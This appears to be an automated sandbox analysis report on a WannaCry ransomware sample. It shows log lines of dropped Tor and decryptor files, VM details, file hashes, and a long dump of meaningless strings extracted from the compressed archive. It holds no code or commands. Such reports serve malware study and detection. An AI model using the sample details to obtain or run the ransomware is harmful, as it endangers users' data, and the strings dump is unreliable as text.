2025-12-08 09:11:44,750 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\TaskData\Tor\libssp-0.dll to files\f28caebe9bc6aa5a72635acb4f0e24500494e306d8e8b2279e7930981281683f; Size is 92599; Max size: 100000000
2025-12-08 09:11:44,765 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\TaskData\Tor\ssleay32.dll to files\bd70ba598316980833f78b05f7eeaef3e0f811a7c64196bf80901d155cb647c1; Size is 711459; Max size: 100000000
2025-12-08 09:11:44,765 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\TaskData\Tor\tor.exe to files\e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb; Size is 3098624; Max size: 100000000
2025-12-08 09:11:44,796 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\TaskData\Tor\zlib1.dll to files\66d653397cbb2dbb397eb8421218e2c126b359a3b0decc0f31e297df099e1383; Size is 107520; Max size: 100000000
2025-12-08 09:11:44,796 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe to files\e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb; Size is 3098624; Max size: 100000000
2025-12-08 09:11:44,812 [lib.common.results] INFO: Uploading file c:\users\user\appdata\roaming\tor\state to files\25a21f7d144e876ef0a01865bf04da24cb0dcdaaa412afe6e1372af5671a7ea4; Size is 222; Max size: 100000000
2025-12-08 09:11:44,812 [lib.common.results] INFO: Uploading file C:\Users\user\Desktop\@WanaDecryptor@.bmp to files\d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa; Size is 1440054; Max size: 100000000
2025-12-08 09:11:44,812 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20251208-1350.log to files\946376bc68aa254a59584d4eff2035d8f1b86bde1fb4fad666b1e8f6629cdff4; Size is 6746; Max size: 100000000
2025-12-08 09:11:44,812 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat to files\76583c27a362f61dfb9ae5b76b869851fab55c2c67559ac0534ebe82b390c072; Size is 128; Max size: 100000000
2025-12-08 09:11:44,828 [root] INFO: Error dumping file from path "c:\users\user\appdata\roaming\tor\lock": [Errno 13] Permission denied
2025-12-08 09:11:44,828 [root] WARNING: Folder at path "C:\fJCIHnd\debugger" does not exist, skipping
2025-12-08 09:11:44,828 [root] WARNING: Folder at path "C:\fJCIHnd\tlsdump" does not exist, skipping
2025-12-08 09:11:44,828 [root] INFO: Analysis completed

    

    

    

    

Machine

Name Label Manager Started On Shutdown On Route
win7-64bit-1 win7-64bit-1 KVM 2025-12-08 17:08:23 2025-12-08 17:11:51 inetsim

File Details

File Name
wannacry.zip
File Type Zip archive data, at least v2.0 to extract, compression method=deflate
File Size 3481477 bytes
MD5 711c0bd141167ac271d15a50eff252c8
SHA1 f4816b8d8539a0b1e003a4818b212ab289ac4010
SHA256 eafb37ab004b34bf6ba90d1c834af232b5db3bf62dc36a216423c259f3bb3bef [VT] [MWDB] [Bazaar]
SHA3-384 f4ac0b277c3870ab846bb7002e1ebb00d728d83504d9fa67cf5bc78c38f40efaabedfae03308f19120a020fde1805e7b
CRC32 DEDB4646
TLSH T158F53354F9A04F99AD6FE66C4784903CAF6B0FB48F86F108DDB678A5C43019EC6824DD
Ssdeep 98304:Hnl4ZFtBXzizFKs0iTEvSq0tCNdC2OY71Y/2F8i:HnSDt5C4i4At/O6i
File BinGraph Vba2Graph

-S%qT
nrL1f
?i:US
o|+?X
`p3OG
gsy>6
:E[x&
B, PT
?C@$F
q\K2@
"I6x2Br
8&e^E
Co$ti3(J
VYMLa
$.{/Q
o}3;b
* /&H
pD$t9
(;0*v
!dIe+
Fp1-#
(QL':
6vckI
M,EIws
/.?$ L
JAS+0O
PHG+*
w^ZhqK\
-:(E]
/|S6*
~KBes
J=d`l@o
EHbyb
MY)43l
@O??XO@i
RB7\S?
":=*$=
~._Vj
kRjBi
BC`~):"
@!7M;.8
d@vK_
^664_
YvcU'
9}$>B
OV/Sz
ti6|`
I6*Gq
'&:H-
f^c~IA
5/nP6
49NW;
aTk4d
b~\TT|<
2t[}Jv
W_HD{
e8sBp
GW'z~
/M.OhPJ
}h]yp
#R52%%
4 Ips
\pvWQ\
D*Fgx
{ %LJEP
8_\uxt
Cjyz+
;cScr
GiA'p(e
1TIf$
wV4!;
IbynT
r0!2R
bXEY(
QIQ3/
c.8lf
[_$cV
h5N%X
?%?eB
[r7L`
d "6rD
W[F% 5(
~Y(Db
&qIZ^a
>jHb(
!dJ.#
8{dW^<
?5jRD(<k!
E<!dk
P(UfOK
C(XCM
Olf{=
<*)I.8
9:~Yy
L0XO1
s{7)R
O&(4$
bmqIO5y
$ctg}
XP(5
z|jK&
/;8ND
o7>g$a
d<TR2S
BAdCl
P8WlE
uAdZS
v^L'S
h<+EB
3rlq}
7=2yc
U~dEo
+Ib&"
}|Qkl
Yk`i;
O{Q.[
$mYl,
iCDmT>O
]JVlF,
pBY^o
s_vR?
&o~%)
%I6D%M
p_PF]
.+p:M}g
Yva:VC,
g:GQ*7
p0(Xi
mCqXS
6=ay`l
0G!G%
yvSyl<~C
{*VJi]
z67y:4
b;X?2
FRb,U
TYT3T
vGP,8
%%WWG^us
[=Sm+L
H{VJy
+$Jb5
B^5>y
dFsq
1zG{XQ
tL"XE
Q{vZq
XkzDPI?
Ov}E+
B[,#]
q.st;Et
x/e-c5\h
)=)=\
SkEL8Q
x3?s9
$f "!
aytXJ9
hf{>N
_~&oI
/O1Jhh
4Dm/U2
d@g8:
L?q!K=
BbCrs
(k0{W
$aym+
{TgE{
2'^X\
"f^Hum
E`P8fX3^Il&Fz;
o#jVu
1ja!#
4fea'%
S1b5|t
1yTV*'
Huns]
?%/K`
;8Gv<C
5<Dl}s
@sGif\
Z"WX,N
K*$ux
l~CXe
MTYK3
Zg,Zoc
ffXTn
7<i`r
rW/4X! 0
:`%5"
`X]<2
m#Psw
N8xR[
tw_1Fu
~wFR0
pS3Kh
\0ort|a
V&:P
FI+diT%
5"$sP
D*s[e
198p?
)\7WJ2>
W4z>Qj
2L[u`d
v$jh$E
/&o_o
#(0;Z;X
wsy03[
Ubf%{
*}6 xB
+,,7
X'*e}
I4pO(
vrf?G
ne:bC
ks@%Q
w$BUV
L&{{U6
%B["z
%q)uiUA~<
K%1O4
\/p-o AOy
*jcLe@
Y;Lef
Dd48/
D&{7/l
tC?(K
1Net/
J[4(tJ_
MZ=R:
QH@"[
,ir&"
M$DT0
AMx5
AzBE(
WF.A9
)K~bs
QZ@ya
c?J(jSES&6
m5P$Tv
L=BZLev
:=c(N
"Ws{8
^~:Pey
{N/@p
[TI{O
QLL>_
l./[{*
1?@o4n
.#++hF
c""w;=
8`#&(
I|L|[
}>30??
N_`(F
bG\EXXG
ErYq!
Wy*wf
r?:ns
~+dMm
=[~o${[
]?m@u
@APqy-n
^k-)-
0M40kq
"rb4#
4s@Kx{
>KM*f
8p; d
9u|U$
F;<Wi2b8mk
kk).N[
@#>cA
ze>jy
bg{ms2
tlDx}F
=OSk1w
.TL:u
/Mx/W
~Lv?7
Q;ll62JT
$)}2H
\R(7|7[
uKgK:U~>h\
G+ak1|X
UTZi|
KYC'T
Fi]EL
JJ>uC*
Wj<jx0
,3C)e
Kx>e[.
{U^rl
rD$mH;
1tnlp
HHw[
upP~;M
S/#n(
[<)&q@eZ>_v
X~UqO
'93}F
WQv{T{
2x$#P
VsZ~^7'
ClfYa
qM%3S
?PpAy
z[\"N
EKEJM
;>W>;
S8y1r
L" +P5
rDKeT
sYPdu
4Kfut~~
x8--=
+T{Ox
NEopo
qNLFs!`+u
XHwoH
*V#JVY
#Tdw~
oqq%
Q>oci
X!F'}
*\T:R
`@N2]
ebb47
ZeukewB
}I^%=x
*G6Fk
MG{(t
ZL[atzMV
.lm8C
A+@i=c
)%=yq
-iqCs
Q;h@o$d
zW,7A#
.MhG^
&P)]Sa
-se;9
:Se_x
?-6<]2
$iv`V
34ve`s
8f9UX
]b_.1
Et)7AoUF
2oHtR
&[sZ[zS\
,g=hv
UkB-@
E@<IS
.5UwB
Y'L(~
"4yC]oCE
F!]_3
Z,/(y
_TWzYN
0L1n'
evs"S
/H_m_3
8X#@M-
!=p&&YS
SCk1BUN
"8fmI
-ib,R
h-ZT6
h53xl
Vo|3[c
A(O"sZ
:,dqm
Fb<tOH|
E,g!cQ
*KF4E
b>Q1N
6nHB6I
SmqLVh
|S"D/
uUcQ<
h-wPR
02?=ut<
|+mfQ+
UXN]H
)^m`3
C},i.
M?V143hw
2Y]sE
Yr9;#
0QeKg
k6"f
YE2g7
m*hvN
M\VU1
HKq^MY
H+`YU6
M6I"YMU`
Y1.hvV
Ti(/(
uNto%
tIE'3^(s
!_JMi
/{SztL1
DZ*J|
2/;(q0BP
]!EN>s
/.JbL
UBEDF
4yC}K^
^QU*C
`P$#pH
9,&"_U
dM)#d
N5MD\S
M/_+"b
C!k$0
mpS(+
[V^7"
%,p97
*@}nF
akvU1
z;i`,
oU`-T!
uc]~T{,
V4%0%hH
|uug\
Oa:& !$C^
`5W*Y
mhT8B
*(|aR
%y9n-
C"$m7
(fp}t
8'7Rt)u
O:"YFa
-Cg+OQLs
1;w"U
Ny}:u
ZP"X"
ke7D!
"jQ_J
_26:-+i
)=Xx}1
pS=XM
$Humz
Q@@GLL;
mw(8\
n8KM8
>E(+x
lE5Cv
N$mcXwM
u#nR,
dQ r0
)tM>G3
oD4F<
G"E#G
UcVms
A_hq
o\!7N?'a
dm:DE
Pi]-?
B8uYv
j=hzfw~
e M-da
C!*$H
L'@Hm
bntWF
we{Fw
.GIh.
Q}Jl;
Rl"A%
t-yHR
_,vGk
|8+WW
r"Gfhm9
{G8m)+
9i*;j
59l5/
db/?6\
r|V?;HfI
!f C$
~Ef?;O
?Xjvj
LI4]=t
C)tOU
}bLA2
DawA(
j$WF7
L^Xi0
T'%SI
?SSf:
}rx"K
AdCgba
!WZRXMm
&A9:(&
rs_sT
(rEW&
L?=>@z
{?-%K
4,oZR
'!xKB
UZbF(
fLbt*
\#r|+
*2(;S
a4@}^
I2z}-"N
Y hHr
sL%wL
w=Gep
Y/;WF]
v#Lva
b-D3"
xP\q\1
RPdE<
v+nNX
EXfJH
\b|HW
?Y>OlE
!<t%v
J:nADZ}
pk#.zM}
U5-a$
e]oq1
y[:>-w.iJ
*D_)4C
j4N?2=}
~lC.w
h9m7+
eM *][
+/6S9
y.C,=
5o?S=G
4z!mD
h&TJu
LB\YvK
}ikF4
3e*u1
49v=<n
HUe4|@n
,Rl5T4f
+l4=4n
7z4'%
~<B}c
oy}=A[&
jP+Yn
42p~xj{
u6WAu
v@fAS
yhk3R
.#()g{
u|t>4
)\=9y8
^v{Pq
Hf=ci>_
+v"w2-_
YYStm7
o}i&7
.epFN
3BmBf
r#}0-[
,V>$M
ZtaFn
VSZS~m
(bKzL
Mu;wL6
O#4\a.
=s=c&x
id)z`z
{UbS/
#(KnS1
U&\dp
p;_kYfh
nJ;Cz
<4,N*
c0Q-N&9
;PUjN
-5R\m
\e/g!J
CE\g;
*xm FKA&
jn-!)6
!7U9#=S
WCjkp
8<B"1
!/~80cG;
,,8mY
5VHyix
u{$al
[S-kI
T_]Y/<d
k$oSV<
EGmcG
h8C:t
C9f|=
_,B1|
]vv<D#
j8W"cxh
C"iZ0a
q6pWo
:s[z|6
*Z6{f
j"o $
ZGKe;
<y}wu
-HL|l+
)Y*_grZ
xG'TR
q3P,%H$#V
OAJMg
5)AmY
Wdv\7
\X-Yk
"uop"
BB`=A+
k>n2t*
*J2{'
,xXMK
S[r.&Yk
K"u6|a
0ku$XK
s5u%$
+fsx_H
kn^KzX^
&S8U`%
;M9 0
,8^u|
FpGhz
eGOt4
+~JW?
-FZ_g
1NU3RK
cx:@S
%HN6!
F~'OHw
9 (Yd
c!^VD
|FO#;
r3`B&}?
}+o":tG
2k;m[
Y4AGy
W\(}K
p0Sn A
72,m!
Y]Cc\8
_Z*H^
%x.*[
#kO3a
pT><Y
@Fh,L
&_d)]
&AK>;
SW)@"
a_h|p
d[-A~
&95Bm
Vsd?-
=ot:}}
daLKZ
i,0!}
['bTJ
%ihn"e&D
h:TyN
}[,!h
HM{Mo
`'yB+~T
Wpqu[
'P4-E
YtTF8
8!A{W59
a+)ze
_3Q/,ek@
=1$y'
HX6[.Mp
QmFLm
$WZ);
"]{Ig
v_Ell
EH$[z
kv>Z`
NC0"AV
qVpXge
~76"Z
YAb!T/p
=?28t
,pc2DZ]m
~>s~j
7vjs]
-IuFY
X{CE_%
j;e+w
1sSRI
o1lb~
R?r{N
uemu)
0>`?>
2msCE
%QC?xwO:
Q^y.l
/ZYn~
zZc`Z|A
8jy@$
mKCb'<
:1Dyb
A<ke)06
Q4#<+
J/"`&
Hm`u%
BKv'm;
.7|sn
_>vJ_^
Fj=tC
eeGNe
NrWjb
r0%&n
U6&_P`
!]L#>)
a|,Pl
}},Fl97
OrH1uF
DV'%,?
*B(D~
xPhaJ
"4}E;
tmES9
P;H<pK|CH
Q$|7q
Q:|k4
$Y0e`q
+cIX|
p(1M%
R<+3b
[fgym
HHn ]*
(d'[:\
<%aBB#s
'~E&H
=Uc:
br78?I71
R[_&O
HPg0AE
ulYJ9
KRh{In$
u#Iz~29
JNQ>:
L2g<y4
=Wjy
h2vh4r:
a&K$+
<CAGp
g#~SY
%EPH!/
ke!tS
rfQQF
+Jnp'!6
{,'Yn/
UgRde
/i6}gD
RW=oH
NksD1
dTuV?
*!cCV.
qm|5c
2c-.Q
uQ)O3
056m"8
2xVYDV
y/.b@v
15_faB
BLW;B
Q&Pc=L
~{"h`?P
z`"O@
/2_YsW
$Igfq
e&-E8
RfYq<
[`e!:
lfMb;
22jmB.
I^{`M
F|7F?
66>C33
C+$ya[~,R
@%UH^
x-X8:x
X|>f8
HlE46M
B;yZf"
g0A9sX
-AP~
lnt-E>
*{"bEm
&]f|vE
!k&\F
Qu</^
r}F#\V
!5].5
E""s_
Xvs[?
+B8`^
64PAP
MKqD@G
e!TX(
,.jQ(
m9Jo.
^X4e3
1;}Y<!
`g_b4
aza>*
`>`"F
fKYj.&
"QDO_
2Lq*vI
4Hb,i
i@V]^
\j&}7
cvD!i
nu@K~
*-Mu\
11,"U)
TRl@eO
n<=Rl]1
h*.lx
M.vLI
^K80s`0
A@$>b90
*/k5pj
#+NX?7
Mwh|5U.
V#i24
wannacry.exeUT
>6O*W
)rtt
_~XGeJ
wL{5H`
">lDh
LBCA1`t
&eJ9p
eduL@
}rVES
Y^3!<
s3'nq
SMPRE
;#Ay5
_i>::
I7}pA
|7rNQk
^/Tx0FBX%J
O*<U5
)3Z}+
I{LO<=]
aQ#}I
Q!9yZ
6fZ d
XK]5a'
cM]B4vZ
p+20g
LA|Zx3
q~7L!
#l)5s
60!E~
J!w~c
zb;OFY/
!eZ2~
oTUNX
u>350
A+W{9
bl1[~
Rcq"D
i2~@q
$rXzW
5Auz>
?!Vj>N
%Mth/
ZKlWB
42o27t
]si$S
Y~`>YB
o-R]s
SrHlH
^*v*'
0[)%mr<m>
YC[a)u
F!H 5
hpP30
=alf$O
e@s1Z
^sd*4
kneB{9G8
iZ&p>
tzt>d
QIx:0
sB"GV
85r!F\
P30Z/
!1C"O
B,z1<
>`;7d
%yQE}
2*f0V
Tpi\.
/2g3]
Q~Me0
:FT(g
h?NhH
OT>_?F@&rX.
}(P_+>
Y~+28
'h6Jw
*yYAjFJ
-oZJT=
cgd7;
y"x*LhS
ca\UK
n$+mg
\60;e
_?HAd
l&49nx
>N_n
0VFv:#A
w)a=p8,
{]Ay!
f;}Pp
F`jTF
~(tYN
E|}kb
Ln/=]
JlMJk
XF9XF=
3dTd+
^pT]!
s*~PDq
Zotsf
pf*eW'
UeU{p
jrwy`Hb
.&b@'y
5[$Tp
:|I(My
,?b"P,&
2knvY
%&`K9
+#@K.=
5#AkO
jC,F<
!&}\.
j;"* .xVn
hG`?c
YibQ'y
Y*)BV`u
qF]qE
1aE,e
^n:&s9
V~jC4
f ct
IuD|J'
=}v{%wk
#<>6j
EWs#e
N~PG/
V-..r
3Pntw
vw.Xr
f8O_:
~C;x}
tGFXv
AFrEv
N[7J*Zq-
h_Y{>
tI@#W
cd0k8hW
O z.'u(
P_&xc
~~Zcy
#B1%k
!{GYU
5y]=t
L YVq
>i^ak
lu:]=ZKjC
68 TU
D"#P}
s!i@K
,qpf${
Mc_`[
@O2BE
]^_i8
Mbt^i
aNx]~1P
)(hKK
OXSxkC
hsup 5
!oUfs3,
&-rQ[:
5h{Pg]
6K'}{
\n4]%q
qRWPJ
U|z p
t5+$o
(&EH$m1%
4]Ps*&
vSALKS
f_&!M
'F>I}
8|n9A
/wvMW
7z<L*
7=pgR
5\*vEd
KpBR+
qrb ?
yz|7qa
r~JWm
K:4,c
TI>PUx^4
7_n2g&
wI^>u
$\5:v
\A:Pk
l?x=8
.gSm^g
_Zl'Q
k< "B{
.PQFNSx
/[?n5z)
^.G,42
Ft <O
LDs=-
yUZ'f
G7`<3
T0uHc
yLiF[
hPiv:
w;=YN
Jj/U
A)mW]
Mf:U{j
.G^lW
N$(37>
u.#YH%
W~F.9dg
z2wYw
J)70BuXG
*$R?<
9|Aa%
ZC3cvO
Ev"rNi
7S~~A
8,ZOh
]NE_y
z[}#x
xSIdk
?dK_Hu
#~S!>
rxiD
&_NAo|
(usaO
rp:d [!
9N_T4W
jzmoUg
#?,>Ol
oy/-,vWa
4'SA9
#Z6tP
-Y[N\N
f;]%4
Y-_ <Lo
?3M>x
&+Q-}
v0>c)
/i9$"
E,$^C
YYWqT
n>R^D
*$ZKe
5:5@J
@0g~s*
Nfu,2=/C89
f<Iq@
z15^>
0L&~;u
:3^Ht
gfI^E
%g*2d
WNnvQ
-Tg0V
>Y[13
u-`(}d
6_~$;
8N=Y:q
HA5\jn
-"fZeO
J#7k7^
=YGmZ4
7V3|P
$y3drK
?;-;~
WJ._D
Bz|\a/\
gYB11
tj?=M
YWBD|~
~SZUm
CcGgW4`
+a6z*
+Z%zi
X[VE=
gsJ/XgTY
"4LT*k
2"CogO
\k`(HF
CIIPu
6..&6oX
X .}a
34QY=
0j=dj
M!Hst
s]k/k
+[]pNi
S:r2=t
ff~<"
eN#P!s
Hxt.$,
cWe9#
I;]{_
2(;|X)
}]{6L
M6hcRe
F1Q^\`
Nf0`f
iw/-"
pyIS$
:6,$a
QnR"d
'v+#J
sxn4^{D
}k~[v
BdkvH
NCSaVFv
GOdy4
|@G0!
r&T8Q
he*&O
>&&+m(
FWzhK
$Jqd"
bB?B*
UJhGhb
tSvaMd
_$)Sc
)K>$a
$Nia3[;
12{u_
|!(VKaVv
+Q2Ds
K+%KS
cnCz:jz
%*=0w
kpk:s.}"
L)wW`
?(Z>K
1/b.&
0P]TGFYr
OS.zv
SU=dmB
oUdEM
0X)wr
vV"|}
G<t|)
GUf\m
jyI?H
mbPzp{w
75`:"-
uqI<s
F~>!U
<0||^;
3|s_}
j.FX-A
x?K#__s
Oq&~ KV~FD
E/{~8
;n2pm
#K%jW
\I]f|
"ORm(o#
/gtNN
v<n+e
3i;__
V'7O*
jXylD.W9
}+bJ3
s0bl[
:Em?k6
K|S=W
1Wf!L
$}2vB[
T<N@n
Ii_hq
k<Zc3
+M#j|
a}+qlb
t+#1<
PX*He
wNDvc
R,?b9z
\W>PE
tx0+F
R(U29q
?n>+)
UEEjQEf
6I|q>
p)_d^
dcZkP
&:FV2
w#W89't
Ehdcm!
Ng=Hb
A?l>q
Q,"#T
,,1$t
uzdsA(
iFbub@
DgJX"L&
3B'}$5
:a)N)d
j*B3Q
x[F@>a{
]o!i&
PEojPa
Hg7L}?|
+iVgn
!Vv l?
X<`;[UwJ
*q +zd
O8\5O
F}k!G
Wa`hnq
voX^"
>Qhx!
wIj87
F-GIF
q$0z)qIQs
yCkeV
{om)L
J*<H{y
r7c&`
}"%?d
Eb'>^6
}fclO
eTI-l
>O69G
*lC:X9
K2U5Q
)"AtC
gghJE
0&P(f
"8qp!
'g3ka
^wZp6
UUVBi
u&*?bo
es3&*
MSo%&
>.oe@
91n0*
CDCQk
S4?@ 3
0JqC5
,nC`wH
|ik(LI_
.^h-j
fmys]
Cp\E7
G7|=j;
0Aj9&5Qfz
\bD+n
wgDbb&l
Y*@W(O.D`!PC)
TOQma
4s8+%
@]y:'
x|o^-
CA/*]
&J@wrL
M3P!Ju)u
1kMJ<v
_'H@~
t}Pw?
1[GH?]
z|bl;
'xD!w
n2|:<
^wR`p
SxaSQ
dj.Uj
ARv4<
Gngaw-
a%-w&
<*mG3/
p=`!%
tk<K|
Yl+hcK(B
d&m@!
VSQYD
VmQQr
SeVb?3y*
HQ|CM
Ydy%:OSW
C{%[>
Rj&l3
&hm%4
C B,~sqe
KERJq
Z3:el
A/tr{
k>m)d
WWk.P
Q8X@X7
^zH'9
epbWm
NQN>l
iOqx9C
4lT+Es
lNs+Se
N+TpI
aKBTx
3m?yB
f&S@{
*G-q-
-@g$KP
6$Ws[U%
wi(6H
B^:@{
v {]W
<D6tx
^".?!
f:}Vr
g^GM$
@^5/C
/BOmi]$
,83\M
\`hWn=
@DDb5
Q=&R12
02SCCL
a"K:Dz
M(2>P%
7HS{-
BVy[1
H,p-m
H8B7X%N&n~
Qt\v[M
DyS^71
Q)i(r7
<BptM
h]'1o
4m*tH
}87MM
1Iop{RJ{
7r;%[yOR
C6OS}
U'WRXEi;
{#noQ
CHB[]
EMo4gh
]$Gws#{
d^-yo
\F[S$
fIn:Z
:DVy3F
jW.<L
-[ w#
7%,da
NH`x|
X5F]IFSsI
Ldjp-_B
9v%0H
"Z{pf4/;l
bDLEC`
Atz.a
O5J},
xu'1
'_?DK!f
CX*7>
`4|>g
xx_Ha
hPb(M
RTzLm
lQYSGv
2~}2{)i
g.pcHB
0tFHV
ft}d2C
rW-rA
wrM`P
xlknlI)
xY%2H
{GE][
dz[ N
$u*!N
AVT\VD
NRCTx
}=/Z>
HVVv|
^!@z_Q_
XYpsP2
gY.go
s~9Z3f+
]|JD_
6L|:6k7+
td(D3
-Xczi
j*VTU)q)
oLWR3
R)Lsj
&<*T@
gIrOU74
kO,2#n
G&yz~
b<A6|WvGin
TM`q0
y-J(,7B
g$|-_
a6|BX:s
;iM!O
ScHc>B<9U
L"lu&
@cW$3
iZA@-n
O{zNK
-|`d*
|H<mD
ks=_M
Z]kTw
9\{p]
_R'SHv
[.ctA
2)65W=08
~}UQ_
P} aU
)aIaV
$^S%_
JCA9/
2fe2$
({&gn
!B%~j
*`<Y;
PF\vf
Sg|?7
D0\h_
\X6A.
@~9)]k
O*aN},
hM`aYxe
j&hE
Vo|3T]
?$k%{
b1~7e
o"7fu
~&/57
hwRGe
d@Z,*
b4N9i
`/s*L
ULlTe
v1X>c4\zh
@\|yz
``c1_
n-Z9z
zVr-o
5*b^T
WwpGr*
w*)V6>L
)li%-
9a~|,
zR+3,
%2"`J&
i;UY+
.W-]x
5GIC}
T4hJAtB
CUs~mT
{#$ny
b[OO-D
X&|d&
iZ(r.
%Vt3C
a`u({,
SI;P&
f7^E8
aAW6cr
`3v%F
W'YmE$
#jZs3
p2FFc
gO`$,4
BT0g,
ZA`6J
7D:3O
<'>BPo
8`z.7
lJ'(}
2z^XO.
4kGhv
2<@sz9
kWuf5<
VBn:6
-'eFWPs
D"azz
)wZfK
#"PV%
^xCkfE)
Y@_^V
*':oE%
Zd4J#
H%7H[kS
{-.Fp
Ou7Q2
8m%zo
"$0Qr
*M=x+:
/e`48k
fKLhk
G2iGT
a!Q{O{s!
J_'eDmq
iCm}3`
%BAQ?k[
\-htei(
^y^$_
BVS:)
DNZ/ty
k=NNJ
l>Vgb1t
y@ei]
rm2gV
[0qAx
=aSm>B
WxcYi
0-by@T95
GiL`_
MJic>
!biyn
/YNMs
o0\E{
s_F^(
1ky;]
8nDdm
=jc1X
RvXbG
_A|x/t
gYmfN
5;k5a
podG.A
e;xG!H
H8R,Io\OT
dArV|
2fbO!
y^U;#
:\X=e/y
zn8xp
ypgSr/
z(J]%
\zvS*J^
_/[9AY
;3nfmJ
Q*BSY7
X]%=]0_&
^Wq%5
RFS$a
S!w$Yv
_Bqet
&pg^m\
teI[0
BnpCoM
+2:75
6]h5&
^bN+`
Ci73/
kI?`Z
p1REj
)69h;
BTXP\
.bG~A
K# #oc
ad BykfU
.mU"i
"U|Nw5
@xY&BmG
xg%R(D}
R$iZC
nUWOS
CTU2QU
KE`"d\
w_';-
=x6yZ
<4KyI
-Tzu.
4b&&g
x9[}wg
P$~bf
6O{xD
g3=4]
g46"^
||#n
5*MNG
0_lrs{}y
YRAB&_
+R[GAz
o`[8'
Plvw*MT
0jMf,l
3UX(~`
t,lav
p*L/D
rUVX~y
N#lm.
+?@Ss
lO:JF
TQSP)
h'$Bs
=R6$U=
pDoaw
mX0>"|
|wX<W
#(6d?
_&LMv
fsm6q
B7+]q
4zE9&
&{}Ja
nzs<Z
WzNw1
!fEE+g
[Cm)O
{vvEC(.Y
yDXDL
Jnxsn]
a~!h=
h&D&8
$L,fB
$0n.;c
>uxK[
40E'v
fiZ!2c
~HDajY
)b@Y:Q
!v PF6
u ]ua#
2~P,u
xMJw0v0
>eL@e
c8lp3>
0A\1otwM
YX.frq
@7o.q-
>[bs*
13"h8
kH}S:
U{Dtz
R]C6Y
Vkiv@
%uyc&
S5/\B
.ixbW|
~Baqu
YHGoQ
)R)Cm
q*BII
\A,d5
;sl8bp
cGvDi
r5/z5
hti6M
|O:)+
?6GlV
!cQ|K
}}V6tiYf
!,k`"W
XXh[{
xYb<O
DDIj|4
L.PK@r
]>NGA9
F%Ejj
~UE^[
Tr)cd
lc8\K
~tO{`
bCp+|
JKKPPU
+B&Rr
p%sd:!.
NB}=m!
_dLuCtZC
%2Cb~
15Q9ZGf2#
M9TTo
8RBE9$%o_
`b}~V
{hJ^gZ Zj'
R=)Vgj
KJ6MA;
W}O2R
{~Y_M
Z!}7O3
f)xiz?
LpPP6I
iOg"q
JqS_v
i]b"d
7o!O7
1o;l>>
(;iKk+:
I<NK&@
s,.LP
R?+(r=
fY-5Q
:@b6&
JiL\~qT
GQ|!c9
T{jvQ
z@YDT
1P.-J9
T]2(z
gd}<.e]
rOMYQ
'CD\d
^2WgL
`u2|x
2WkH5M
\~f CP
jbx/v,
K)Rk"
` z[RXc
YYnzR4
}tb[S
`1D#*
Oaqek
XFbI]
*)$cl
p*)pW
&~"|w7q
]0/iM5
4=09s
J206Dz
4I3>o
g4G$D
~x@"ll
M=gdTJ
+Biv%sq
5c(~h73(
T2E/%K
!EBM.
r"Yvl5
GI!hs
A<CkL=
D,_Qgv2u
`|AaT
zZ99S
N6$T3
Hi,>@
tV_O(
n\t6*o
p<kvN7^
7`CZyS
?2}k(iC
j:[gN
m;2v3o
9v2!C*`Q
hLo&~r
S1A-e
Mn0nM
"&bcQ
-Ft-y
'6+>D
;~ !b
0jmo!4R
CDHQE^
81J!L
WRZTG
IZ;qPbC
:uWN'
O6H)%
Mj."p
Q+i!*
iV0nX
8U(-m J
%MB%R`
nIYn]P
%GmEB
HPsI3
+*9?i
YRd\A
!<jLV
N=ibi+
/14W%
91 .gc
D?9k7n[=
B:{AP6,5
ycg{p9
l:U(l
w>f;E
} zHbWW
V>.6(
k{[SCp&m
#^/-2
z=MBu
MY<`w
DN6g?#o
;SstK
3WsMl*
Bu:#R
L:'R"
4%xvt
2Sog%
h8WFeuM?
J'4~_1
HhZw<2)Zt)]
=:VUv
2(+#p^
E-4(B
_Ybaf
-y6\V]
L't"%
wrcB:O
a1%$=H
7P\Ad
%kR.H
^3mi>
7tKeW
4:d9S
/`s&Ld
^O'BS
,&Y[f
&M!]o
B w=C
)AwPHAyd
n|62FB
]HhK1
swe+s
i)x~R
bYE1r
*|BY$m
dFN1v
_g+M@
5[Kh_3
nj<FM
5kC2K
L&2:%
8W-/K
Dqv\8
KBfOW
,7V >{|
t)1LW|
'Rqop
!XN.|
vmTC-Q
VUv7R|
xX[ap
[^0_\W
!PqY^
0uV,-N-DJhF,J
KAhs\
gLa5>)bs
Sv /Q
u7!L}
G9`&)|3
#3DHL
6eMb^
0(w0[
oF}fp
Q|y?&
.0xU3
w<GGz
xqSYh.
W]+!oh
z`3(T
9#@4Yj?
qeWg$6
%7k%l
/2a5+AG
EZSW6
-m^#$
\'{Ld
(PK(5
w#)%G
7R/fg
/-&4h
?O%&7_
'#S2#Z
;W.4:
9"v9i-
l!7:GY
h,-]~
51R)>Dc
G>$%#iv
k)DCK
El9,v
.4yw0
-q<^p
5|.by
\9^?<3
D70XYS!m
mOA]aR(
^X7AnS
j1|:=
JMo*O
E'ZQ~x0^
3R!4:
2O[wt
fj:ZFi
9w],.
iuLJd
k6l3n!
B~G+P
yU5#7C
I@>jo
jkKQw
`ij8q1w
p$z1w
7>?s&qJ=
6sLK^u
uS|vK
t(x4:
Cx}8U
-oiW?7)
|9;d\
}YJLX
~,-L*&
{1uTG
r{xiS
Bx$TF
n:LXr
@>"W(
G8XJ#ovS
Bk*xR
bSp8]
Y\`1O
Ja7.H
V9&p\,
gs5>J
h!bXJ
)GNOfI
I*'"iC
?\iC9
< FH*@
TPFfK
ND?v;
;?OjH
G`Ias
w29i#
xVd45
ZPa^O
[$Z6,
HwYGd
+%T-L
@t%}P
TH/D;
T)&%x"
YxPB~
YAokS
;?1)i
$$C3=
)sof"|
%\):^
>Z!u:B(V
Dm^kB
))i#cK
o\gUx&;
I.%KC
^{K$5
5]BHGl7:
CK?jW
i'A= /
/T1k)
Ih;~_
QDrp8
